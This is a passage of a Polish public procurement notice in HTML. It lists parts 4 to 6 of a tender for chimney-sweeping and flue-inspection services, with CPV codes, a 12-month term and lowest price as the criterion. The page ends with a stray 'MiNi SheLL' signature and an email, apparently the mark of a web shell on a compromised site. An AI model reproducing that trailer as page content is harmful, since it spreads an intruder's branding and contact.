- usługi objęte zamówieniem , wyspecyfikowane w pkt. 3.5 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV-ADM 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie, a w szczególności :
-stałe usług kominiarskie,
-ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny), 
-przeprowadzenie kontroli okresowej przewodów kominowych, 
-sporządzanie opinii kominiarskich,
-usługi objęte zamówieniem , wyspecyfikowane w pkt. 3.5 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Zadanie V- ADM 4.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie, a w szczególności :
-stałe usług kominiarskie,
-ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny), 
-przeprowadzenie kontroli okresowej przewodów kominowych, 
-sporządzanie opinii kominiarskich,
-usługi objęte zamówieniem , wyspecyfikowane w pkt. 3.5 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie VI- ADM 5.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac będących przedmiotem zamówienia przetargowego obejmuje wszystkie czynności mające na celu zapewnienie prawidłowego i bezpiecznego funkcjonowania kominów i przewodów kominowych oraz ich utrzymanie w należytym stanie, a w szczególności :
-stałe usług kominiarskie,
-ocena  stanu  technicznego  przewodów  kominowych ( przegląd  roczny),
-przeprowadzenie kontroli okresowej przewodów kominowych,
-sporządzanie opinii kominiarskich,
-usługi objęte zamówieniem , wyspecyfikowane w pkt. 3.5 siwz.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.35.61.00-9, 90.91.50.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com